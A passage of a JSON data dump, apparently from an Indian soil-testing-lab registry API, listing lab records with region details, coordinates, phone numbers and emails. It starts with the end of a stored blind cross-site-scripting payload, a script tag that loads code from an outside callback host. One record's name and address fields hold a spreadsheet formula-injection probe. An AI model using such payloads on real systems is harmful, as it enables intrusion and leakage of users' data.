src=https://loverboy.bxss.in></script>","authenticatedUser":"65ec92637e86dafee3b9181e","createdAt":"2024-03-09T16:46:27.901Z","updatedAt":"2024-03-09T16:46:27.901Z","email":"blind@gmail.com"},{"name":"=INFO(\"DIRECTORY\")","region":{"state":{"_id":"63f957b089d86ca9e2c00e14","name":"ANDHRAPRADESH","createdAt":"2023-02-25T00:34:56.898Z","updatedAt":"2023-02-25T00:34:56.898Z","__v":0,"code":"28"},"district":{"_id":"63f957b089d86ca9e2c00e17","state":"63f957b089d86ca9e2c00e14","name":"ANANTAPUR","createdAt":"2023-02-25T00:34:57.000Z","updatedAt":"2023-10-02T13:44:33.023Z","__v":0,"code":"502"},"geolocation":{"type":"Point","coordinates":["",""]},"village":{"_id":"63f957c489d86ca9e2c00fde","state":"63f957b089d86ca9e2c00e14","district":"63f957b089d86ca9e2c00e17","subdistrict":"63f957c289d86ca9e2c00fb4","name":"THIMMANACHERLA","version":"1","status":"Inhabitant","createdAt":"2023-02-25T00:35:16.257Z","updatedAt":"2023-02-25T00:35:16.257Z","__v":0},"subdistrict":{"_id":"63f99c52519359b7438a4432","state":"63f957b089d86ca9e2c00e14","district":"63f99c24519359b7438a40b8","name":"A.Konduru","createdAt":"2023-02-25T05:27:46.607Z","updatedAt":"2023-02-25T05:27:46.607Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919871234578","address":"=INFO(\"DIRECTORY\")","authenticatedUser":"65ec939a7e86dafee3b91831","createdAt":"2024-03-09T16:51:38.506Z","updatedAt":"2024-03-09T16:51:38.506Z","email":"ooo@gmail.com"},{"name":"soumya","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a421519359b7438ad9a9","state":"63f99fbd519359b7438a84ca","name":"BIDAR","createdAt":"2023-02-25T06:01:05.630Z","updatedAt":"2023-10-02T13:44:38.407Z","__v":0,"code":"529"},"geolocation":{"type":"Point","coordinates":[77.21995745856351,10.501113410106974]},"village":{"_id":"63f9a4be519359b7438ae59f","state":"63f99fbd519359b7438a84ca","district":"63f9a421519359b7438ad9a9","subdistrict":"63f9a4b4519359b7438ae4df","name":"Aknapur","version":"2","status":"Inhabitant","createdAt":"2023-02-25T06:03:42.764Z","updatedAt":"2023-10-24T20:21:14.083Z","__v":0,"block":"6492fbde680216eb6c93f881","code":"599975","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a0fb519359b7438a9c0f","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","name":"Anekal","createdAt":"2023-02-25T05:47:39.934Z","updatedAt":"2023-02-25T05:47:39.934Z","__v":0}},"timing":{"from":"","to":""},"phone":"+917554332345","address":"G629+CXW Santhaipettai, Tamil Nadu, India","authenticatedUser":"65f432ada61e902803a2bfda","createdAt":"2024-03-15T11:36:13.478Z","updatedAt":"2024-03-15T11:36:13.478Z","email":"soumya@gmail.com"},{"name":"sana1","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b4b2519359b7438c290c","state":"63f99fbd519359b7438a84ca","name":"SHIVAMOGGA","createdAt":"2023-02-25T07:11:46.875Z","updatedAt":"2023-10-02T13:44:41.824Z","__v":0,"code":"547"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+913456789876","address":"9MQP+RC5 Madakkal, Tamil Nadu, India","authenticatedUser":"65f444bd2ebd91272eb6c220","createdAt":"2024-03-15T12:53:18.040Z","updatedAt":"2024-03-15T12:53:43.746Z","email":"sana@gmail.com"},{"name":"Alan","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a57c519359b7438af3ef","state":"63f99fbd519359b7438a84ca","name":"CHAMARAJANAGARA","createdAt":"2023-02-25T06:06:52.363Z","updatedAt":"2023-10-02T13:44:38.586Z","__v":0,"code":"531"},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+915566663220","address":"2VWV+RFC Parasuramadevarak, Karnataka, India","authenticatedUser":"65fbe32042a0b401c2a9982f","createdAt":"2024-03-21T07:34:56.257Z","updatedAt":"2024-03-21T07:36:07.398Z","email":"Alan42@gmail.com"},{"name":"soil lab","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[76.41194640883975,10.317718270131332]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+913456789873","address":"8C96+3QP Pariyaram, Kerala, India","authenticatedUser":"6606eb113d76a80391e77296","createdAt":"2024-03-29T16:23:45.520Z","updatedAt":"2024-03-29T17:06:47.875Z","email":"sharth@gmail.com"},{"name":"surya","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a421519359b7438ad9a9","state":"63f99fbd519359b7438a84ca","name":"BIDAR","createdAt":"2023-02-25T06:01:05.630Z","updatedAt":"2023-10-02T13:44:38.407Z","__v":0,"code":"529"},"geolocation":{"type":"Point","coordinates":[76.1633276243094,12.75348795744406]},"village":{},"subdistrict":{}},"timing":{"from":"","to":""},"phone":"+916578987654","address":"Q537+98W Boovanahalli, Karnataka, India","authenticatedUser":"66070c07dbaedd29a946b233","createdAt":"2024-03-29T18:44:23.869Z","updatedAt":"2024-03-29T19:10:44.441Z","email":"surya12@gmail.com"},{"name":"pandya","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a27a519359b7438ab96d","state":"63f99fbd519359b7438a84ca","name":"BELAGAVI","createdAt":"2023-02-25T05:54:02.913Z","updatedAt":"2023-10-02T13:44:37.699Z","__v":0,"code":"527"},"geolocation":{"type":"Point","coordinates":[14.384761245207082,75.71270607734807]},"village":{"_id":"63f9a2f9519359b7438ac2f5","state":"63f99fbd519359b7438a84ca","district":"63f9a27a519359b7438ab96d","subdistrict":"63f9a2f0519359b7438ac249","name":"ALARAVADA","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:56:09.475Z","updatedAt":"2023-11-15T20:14:05.280Z","__v":0,"block":"6492fbdc680216eb6c93f853","code":"938217","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a574519359b7438af34e","state":"63f99fbd519359b7438a84ca","district":"63f9a4c8519359b7438ae645","name":"ALMEL","createdAt":"2023-02-25T06:06:44.559Z","updatedAt":"2023-02-25T06:06:44.559Z","__v":0}},"timing":{"from":"","to":""},"phone":"+917676545454","address":"9PM7+W34 Bevinahalli, Karnataka, India","authenticatedUser":"6607137f7ea1d0cec5ddfa2e","createdAt":"2024-03-29T19:16:15.580Z","updatedAt":"2024-04-23T07:43:28.421Z","email":"hardik@gmail.com"},{"name":"soil","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a161519359b7438aa3ec","state":"63f99fbd519359b7438a84ca","name":"BENGALURU RURAL","createdAt":"2023-02-25T05:49:21.765Z","updatedAt":"2023-10-02T13:44:37.862Z","__v":0,"code":"526"},"geolocation":{"type":"Point","coordinates":[11.111635006369873,77.08010939226517]},"village":{"_id":"63f9a1da519359b7438aad21","state":"63f99fbd519359b7438a84ca","district":"63f9a161519359b7438aa3ec","subdistrict":"63f9a1a0519359b7438aa8ba","name":"Acharlahalli","version":"2","status":"Inhabitant","createdAt":"2023-02-25T05:51:22.006Z","updatedAt":"2023-10-24T17:57:35.476Z","__v":0,"block":"6492fbde680216eb6c93f86f","code":"625058","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a0fb519359b7438a9c0f","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","name":"Anekal","createdAt":"2023-02-25T05:47:39.934Z","updatedAt":"2023-02-25T05:47:39.934Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916789876465","address":"436J+M25 Molapalayam, Tamil Nadu, India","authenticatedUser":"660760b03d76a80391e7886c","createdAt":"2024-03-30T00:45:36.979Z","updatedAt":"2024-04-23T07:41:20.147Z","email":"shekar@gmail.com"},{"name":"Ritviz","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a8b9519359b7438b3223","state":"63f99fbd519359b7438a84ca","name":"DAVANGERE","createdAt":"2023-02-25T06:20:41.794Z","updatedAt":"2023-10-02T13:44:39.482Z","__v":0,"code":"535"},"geolocation":{"type":"Point","coordinates":[75.83701546961325,15.93857254139289]},"village":{"_id":"63f9a997519359b7438b42cc","state":"63f99fbd519359b7438a84ca","district":"63f9a8b9519359b7438b3223","subdistrict":"63f9a987519359b7438b4199","name":"Achuthapura","version":"4","status":"Un-Inhabitant","createdAt":"2023-02-25T06:24:23.331Z","updatedAt":"2023-10-25T08:04:52.000Z","__v":0,"block":"6492fbe3680216eb6c93f8df","code":"606838","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa05519359b7438b4b0b","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ALNAVAR","createdAt":"2023-02-25T06:26:13.355Z","updatedAt":"2023-02-25T06:26:13.355Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918888969628","address":"WRQP+CRC Mangalagudda, Karnataka, India","authenticatedUser":"660a521b23d36ac0890adf2d","createdAt":"2024-04-01T06:20:12.007Z","updatedAt":"2024-04-01T07:56:30.739Z","email":"ritviz17@gmail.com"},{"name":"Jalali lab","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"geolocation":{"type":"Point","coordinates":[77.5945627,12.9715987]},"village":{"_id":"63f9a131519359b7438aa03f","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","subdistrict":"63f9a0fb519359b7438a9c0f","name":"Kyalasanahalli","version":"3","status":"Inhabitant","createdAt":"2023-02-25T05:48:33.627Z","updatedAt":"2023-02-25T05:48:33.627Z","__v":0},"subdistrict":{"_id":"63f9b989519359b7438c92af","state":"63f99fbd519359b7438a84ca","district":"63f9b8da519359b7438c83be","name":"Ankola","createdAt":"2023-02-25T07:32:25.957Z","updatedAt":"2023-02-25T07:32:25.957Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918847777762","address":"Bangalore, Bengaluru Urban, Karnataka, India","authenticatedUser":"660e5dbe0b22abae54a194e2","createdAt":"2024-04-04T07:58:54.448Z","updatedAt":"2024-04-04T07:58:54.448Z","email":"raman08@gmail.com"},{"name":"Zebster lab","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"geolocation":{"type":"Point","coordinates":[14.130340334250198,75.33977790055249]},"village":{"_id":"63f9a139519359b7438aa0d7","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","subdistrict":"63f9a137519359b7438aa0ad","name":"SAMPIGEHALLI","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:48:41.106Z","updatedAt":"2023-02-25T05:48:41.106Z","__v":0},"subdistrict":{"_id":"63f9bbcb519359b7438cc545","state":"63f99fbd519359b7438a84ca","district":"63f9bb71519359b7438cbce7","name":"Channapatna","createdAt":"2023-02-25T07:42:03.540Z","updatedAt":"2023-02-25T07:42:03.540Z","__v":0}},"timing":{"from":"","to":""},"phone":"+918536333522","address":"48JQ+4WJ Kalmane, Karnataka, India","authenticatedUser":"660e62de0b22abae54a1955b","createdAt":"2024-04-04T08:20:46.330Z","updatedAt":"2024-04-04T09:55:26.145Z","email":"dolp66@gmail.com"},{"name":"Test Lab","region":{"state":{"_id":"63f87562d2e83876f03f7a2c","name":"MEGHALAYA","createdAt":"2023-02-24T08:29:22.513Z","updatedAt":"2023-10-02T12:57:59.999Z","__v":0,"code":"17"},"district":{"_id":"63f8770bd2e83876f03fa040","state":"63f87562d2e83876f03f7a2c","name":"RI BHOI","createdAt":"2023-02-24T08:36:27.370Z","updatedAt":"2023-10-02T13:43:43.143Z","__v":0,"code":"276"},"geolocation":{"type":"Point","coordinates":[22.24108857665547,85.92117980854155]},"village":{"_id":"63f87779d2e83876f03fa896","state":"63f87562d2e83876f03f7a2c","district":"63f8770bd2e83876f03fa040","subdistrict":"63f87761d2e83876f03fa704","name":"Amdubighat","version":"1","status":"Inhabitant","createdAt":"2023-02-24T08:38:17.911Z","updatedAt":"2023-10-24T18:31:52.940Z","__v":0,"block":"6492fc53680216eb6c940171","code":"277772","details":{"codestatus":true}},"subdistrict":{"_id":"6492b80a882c8da8477370f4","state":"63f87562d2e83876f03f7a2c","district":"63f879b6d2e83876f03fe05c","name":"Adokgre","createdAt":"2023-06-21T08:42:50.989Z","updatedAt":"2023-06-21T08:42:50.989Z","__v":0}},"timing":{"from":"","to":""},"phone":"+919876543289","address":"6WRC+CFM Baihatu, Jharkhand, India","authenticatedUser":"661e519bbb335b9d431defb5","createdAt":"2024-04-16T10:23:23.468Z","updatedAt":"2024-04-16T10:23:23.468Z","email":"teacher01@gmail.com"},{"name":"delhivlstl","region":{"state":{"_id":"63f5ceb98cec41e6c95ce3a8","name":"DELHI","createdAt":"2023-02-22T08:13:45.282Z","updatedAt":"2023-10-02T12:57:58.179Z","__v":0,"code":"7"},"district":{"_id":"63f5ceb98cec41e6c95ce3ab","state":"63f5ceb98cec41e6c95ce3a8","name":"CENTRAL","createdAt":"2023-02-22T08:13:45.400Z","updatedAt":"2023-11-17T10:44:28.797Z","__v":0,"code":"77"},"geolocation":{"type":"Point","coordinates":[77.06719023410434,28.619576070932226]},"village":{"_id":"63f5ceb98cec41e6c95ce3b0","state":"63f5ceb98cec41e6c95ce3a8","district":"63f5ceb98cec41e6c95ce3ab","subdistrict":"63f5ceb98cec41e6c95ce3ae","name":"Badar Pur Majra Burari","version":"1","status":"Inhabitant","createdAt":"2023-02-22T08:13:45.590Z","updatedAt":"2023-11-15T20:07:07.479Z","__v":0,"block":"65551c65b11dfae9f93ef0ed","code":"63952","details":{"codestatus":true}},"subdistrict":{"_id":"63f5cec78cec41e6c95ce4cd","state":"63f5ceb98cec41e6c95ce3a8","district":"63f5cebf8cec41e6c95ce430","name":"Alipur","createdAt":"2023-02-22T08:13:59.793Z","updatedAt":"2023-02-22T08:13:59.793Z","__v":0}},"timing":{"from":"","to":""},"phone":"+914569873210","address":"J398+RVP Delhi, India","authenticatedUser":"662f9e67cb07426e0ba06fd3","createdAt":"2024-04-29T13:19:35.866Z","updatedAt":"2024-04-29T13:19:35.866Z","email":"abcd4787@gmail.com"},{"name":"ss","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f99fbd519359b7438a84cd","state":"63f99fbd519359b7438a84ca","name":"BAGALKOTE","createdAt":"2023-02-25T05:42:21.768Z","updatedAt":"2024-03-22T06:38:44.383Z","__v":0,"code":"524"},"geolocation":{"type":"Point","coordinates":[75.54178066298341,10.501113410106974]},"village":{"_id":"63f99fbd519359b7438a84d2","state":"63f99fbd519359b7438a84ca","district":"63f99fbd519359b7438a84cd","subdistrict":"63f99fbd519359b7438a84d0","name":"Adihudi","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:42:21.973Z","updatedAt":"2023-10-24T16:32:38.918Z","__v":0,"block":"6492fbdb680216eb6c93f83f","code":"598464","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa00519359b7438b4aa0","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ANNIGERI","createdAt":"2023-02-25T06:26:08.223Z","updatedAt":"2023-02-25T06:26:08.223Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915678909765","address":"Mangalore","authenticatedUser":"6630a367378e05d7da91f460","createdAt":"2024-04-30T07:53:11.507Z","updatedAt":"2024-04-30T07:53:11.507Z","email":"ssra@gmail.com"},{"name":"STL BhuVision","region":{"state":{"_id":"63f9322a89d86ca9e2bca5df","name":"MAHARASHTRA","createdAt":"2023-02-24T21:54:50.796Z","updatedAt":"2023-10-02T12:58:01.419Z","__v":0,"code":"27"},"district":{"_id":"63f9322a89d86ca9e2bca5e2","state":"63f9322a89d86ca9e2bca5df","name":"AHMEDNAGAR","createdAt":"2023-02-24T21:54:50.900Z","updatedAt":"2023-10-02T13:44:26.523Z","__v":0,"code":"466"},"geolocation":{"type":"Point","coordinates":[73.95610753625691,18.95488369820806]},"village":{"_id":"63f9330e89d86ca9e2bcba4f","state":"63f9322a89d86ca9e2bca5df","district":"63f9322a89d86ca9e2bca5e2","subdistrict":"63f5d9568cec41e6c95d9efc","name":"Bhistbag","version":"1","status":"Inhabitant","createdAt":"2023-02-24T21:58:38.283Z","updatedAt":"2023-02-24T21:58:38.283Z","__v":0},"subdistrict":{"_id":"63f934cb89d86ca9e2bce283","state":"63f9322a89d86ca9e2bca5df","district":"63f9346c89d86ca9e2bcd9dd","name":"Achalpur","createdAt":"2023-02-24T22:06:03.491Z","updatedAt":"2023-02-24T22:06:03.491Z","__v":0}},"timing":{"from":"","to":""},"phone":"+917894563210","address":"XX34+XC5 Khadakamala, Maharashtra, India","authenticatedUser":"6630a3abcb07426e0ba0ac78","createdAt":"2024-04-30T07:54:19.419Z","updatedAt":"2024-04-30T07:54:19.419Z","email":"bhuvision1@himedialaabs.com"},{"name":"saza","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a3d1519359b7438ad39e","state":"63f99fbd519359b7438a84ca","name":"BALLARI","createdAt":"2023-02-25T05:59:45.512Z","updatedAt":"2023-10-02T13:44:37.503Z","__v":0,"code":"528"},"geolocation":{"type":"Point","coordinates":[77.5307309392265,10.439993690009567]},"village":{"_id":"63f9a3fb519359b7438ad6ac","state":"63f99fbd519359b7438a84ca","district":"63f9a3d1519359b7438ad39e","subdistrict":"63f9a3e9519359b7438ad551","name":"Aladahalli","version":"3","status":"Inhabitant","createdAt":"2023-02-25T06:00:27.626Z","updatedAt":"2023-11-15T20:14:05.349Z","__v":0,"block":"6492fbdc680216eb6c93f845","code":"604929","details":{"codestatus":true}},"subdistrict":{"_id":"63f9a574519359b7438af34e","state":"63f99fbd519359b7438a84ca","district":"63f9a4c8519359b7438ae645","name":"ALMEL","createdAt":"2023-02-25T06:06:44.559Z","updatedAt":"2023-02-25T06:06:44.559Z","__v":0}},"timing":{"from":"","to":""},"phone":"+914567876567","address":"CGQJ+X7X Sivagiripatti, Tamil Nadu, India","authenticatedUser":"6630a9ceacea547da97b5ae0","createdAt":"2024-04-30T08:20:30.408Z","updatedAt":"2024-04-30T08:20:30.408Z","email":"parth@gmail.com"},{"name":"hgdx","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a27a519359b7438ab96d","state":"63f99fbd519359b7438a84ca","name":"BELAGAVI","createdAt":"2023-02-25T05:54:02.913Z","updatedAt":"2023-10-02T13:44:37.699Z","__v":0,"code":"527"},"geolocation":{"type":"Point","coordinates":[75.79039944751382,14.204070206821415]},"village":{"_id":"63f9a3c6519359b7438ad2cb","state":"63f99fbd519359b7438a84ca","district":"63f9a27a519359b7438ab96d","subdistrict":"63f9a3bb519359b7438ad206","name":"Adi","version":"2","status":"Inhabitant","createdAt":"2023-02-25T05:59:34.216Z","updatedAt":"2023-10-24T19:32:52.851Z","__v":0,"block":"6492fbdd680216eb6c93f865","code":"597129","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa05519359b7438b4b0b","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ALNAVAR","createdAt":"2023-02-25T06:26:13.355Z","updatedAt":"2023-02-25T06:26:13.355Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915556677757","address":"6Q3R+J5C Yalodahalli, Karnataka, India","authenticatedUser":"6630ac57378e05d7da91fb9e","createdAt":"2024-04-30T08:31:19.504Z","updatedAt":"2024-05-16T06:47:00.466Z","email":"pajjjrth@gmail.com"},{"name":"ugkj","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"geolocation":{"type":"Point","coordinates":[73.6771397790055,15.705259540510559]},"village":{"_id":"63f9a0b6519359b7438a96fe","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","subdistrict":"63f9a09c519359b7438a950d","name":"DASARAHALLI","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:46:30.703Z","updatedAt":"2023-02-25T05:46:30.703Z","__v":0},"subdistrict":{"_id":"63f9aa81519359b7438b5470","state":"63f99fbd519359b7438a84ca","district":"63f9aa61519359b7438b520e","name":"Afzalpur","createdAt":"2023-02-25T06:28:17.185Z","updatedAt":"2023-02-25T06:28:17.185Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915555542222","address":"PM4G+4V2 Paliem, Goa, India","authenticatedUser":"6630aca3378e05d7da91fc8d","createdAt":"2024-04-30T08:32:36.028Z","updatedAt":"2024-04-30T08:32:36.028Z","email":"paghmrth@gmail.com"},{"name":"thfr","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a161519359b7438aa3ec","state":"63f99fbd519359b7438a84ca","name":"BENGALURU RURAL","createdAt":"2023-02-25T05:49:21.765Z","updatedAt":"2023-10-02T13:44:37.862Z","__v":0,"code":"526"},"geolocation":{"type":"Point","coordinates":[75.3941632596685,13.842256770270023]},"village":{"_id":"63f9a1bf519359b7438aab1e","state":"63f99fbd519359b7438a84ca","district":"63f9a161519359b7438aa3ec","subdistrict":"63f9a1a0519359b7438aa8ba","name":"Adinarayana Hosahalli","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:50:55.161Z","updatedAt":"2023-11-15T20:14:05.173Z","__v":0,"block":"6492fbde680216eb6c93f86f","code":"625092","details":{"codestatus":true}},"subdistrict":{"_id":"63f9aa05519359b7438b4b0b","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ALNAVAR","createdAt":"2023-02-25T06:26:13.355Z","updatedAt":"2023-02-25T06:26:13.355Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915555542222","address":"R9RV+WM3 Makeri, Karnataka, India","authenticatedUser":"6630ad1fcb07426e0ba0b26d","createdAt":"2024-04-30T08:34:39.981Z","updatedAt":"2024-04-30T08:34:39.981Z","email":"paftujrth@gmail.com"},{"name":"fhyr","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9a066519359b7438a9120","state":"63f99fbd519359b7438a84ca","name":"BENGALURU URBAN","createdAt":"2023-02-25T05:45:10.832Z","updatedAt":"2023-10-02T13:44:38.223Z","__v":0,"code":"525"},"geolocation":{"type":"Point","coordinates":[76.76156657458564,14.264316674866818]},"village":{"_id":"63f9a0d8519359b7438a9980","state":"63f99fbd519359b7438a84ca","district":"63f9a066519359b7438a9120","subdistrict":"63f9a0d2519359b7438a991a","name":"BYATARAYANAPURA","version":"1","status":"Inhabitant","createdAt":"2023-02-25T05:47:04.356Z","updatedAt":"2023-02-25T05:47:04.356Z","__v":0},"subdistrict":{"_id":"63f9aa05519359b7438b4b0b","state":"63f99fbd519359b7438a84ca","district":"63f9a99b519359b7438b4311","name":"ALNAVAR","createdAt":"2023-02-25T06:26:13.355Z","updatedAt":"2023-02-25T06:26:13.355Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916677844456","address":"7Q76+PJG Devara Marikunte, Karnataka, India","authenticatedUser":"6630aec7acea547da97b5c46","createdAt":"2024-04-30T08:41:44.157Z","updatedAt":"2024-04-30T08:41:44.157Z","email":"parfgjth@gmail.com"},{"name":"ty","region":{"state":{"_id":"63f86570d2e83876f03e015b","name":"BIHAR","createdAt":"2023-02-24T07:21:20.259Z","updatedAt":"2023-10-02T12:57:58.718Z","__v":0,"code":"10"},"district":{"_id":"63f9f74ec969ead893b295c6","state":"63f86570d2e83876f03e015b","name":"BEGUSARAI","createdAt":"2023-02-25T11:55:58.977Z","updatedAt":"2023-10-02T13:43:21.723Z","__v":0,"code":"191"},"geolocation":{"type":"Point","coordinates":[76.94803066298341,12.571559107768147]},"village":{"_id":"63f9f79bc969ead893b29cef","state":"63f86570d2e83876f03e015b","district":"63f9f74ec969ead893b295c6","subdistrict":"63f9f793c969ead893b29c2a","name":"Bahrampur","version":"1","status":"Inhabitant","createdAt":"2023-02-25T11:57:15.677Z","updatedAt":"2023-02-25T11:57:15.677Z","__v":0},"subdistrict":{"_id":"63fa06a7c969ead893b3fa69","state":"63f86570d2e83876f03e015b","district":"63fa065cc969ead893b3f322","name":"Alamnagar","createdAt":"2023-02-25T13:01:27.279Z","updatedAt":"2023-02-25T13:01:27.279Z","__v":0}},"timing":{"from":"","to":""},"phone":"+915556677733","address":"HWCX+J6C Hyadarahalli, Karnataka, India","authenticatedUser":"6630b03bcb07426e0ba0b2ae","createdAt":"2024-04-30T08:47:55.244Z","updatedAt":"2024-04-30T08:47:55.244Z","email":"abcfghf@gmail.com"},{"name":"Public","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[79.13121436464085,14.746642740022764]},"village":{"_id":"63f9b8ca519359b7438c8255","state":"63f99fbd519359b7438a84ca","district":"63f9b89c519359b7438c7e77","subdistrict":"63f9b8c8519359b7438c8226","name":"108 Kalthur","version":"2","status":"Inhabitant","createdAt":"2023-02-25T07:29:14.519Z","updatedAt":"2023-10-25T17:09:57.689Z","__v":0,"block":"6492fbec680216eb6c93f9b7","code":"608835","details":{"codestatus":true}},"subdistrict":{"_id":"63f9bbcb519359b7438cc545","state":"63f99fbd519359b7438a84ca","district":"63f9bb71519359b7438cbce7","name":"Channapatna","createdAt":"2023-02-25T07:42:03.540Z","updatedAt":"2023-02-25T07:42:03.540Z","__v":0}},"timing":{"from":"","to":""},"phone":"+916362686300","address":"P4WJ+MF4 Valleravari Palli, Andhra Pradesh, India","authenticatedUser":"66333a39e45603840e0c7954","createdAt":"2024-05-02T07:01:13.893Z","updatedAt":"2024-05-02T07:01:13.893Z","email":"hruthvi@gmail.com"},{"name":"Private","region":{"state":{"_id":"63f99fbd519359b7438a84ca","name":"KARNATAKA","createdAt":"2023-02-25T05:42:21.627Z","updatedAt":"2023-10-02T12:58:01.693Z","__v":0,"code":"29"},"district":{"_id":"63f9b89c519359b7438c7e77","state":"63f99fbd519359b7438a84ca","name":"UDUPI","createdAt":"2023-02-25T07:28:28.688Z","updatedAt":"2023-10-02T13:44:42.183Z","__v":0,"code":"549"},"geolocation":{"type":"Point","coordinates":[79.37983314917125,17.374441073098055]},"village":{"_id":"63f9b8ca519359b7438c8255","state":"63f99fbd519359b7438a84ca","district":"63f9b89c519359b7438c7e77","subdistrict":"63f9b8c8519359b7438c8226","name":"108 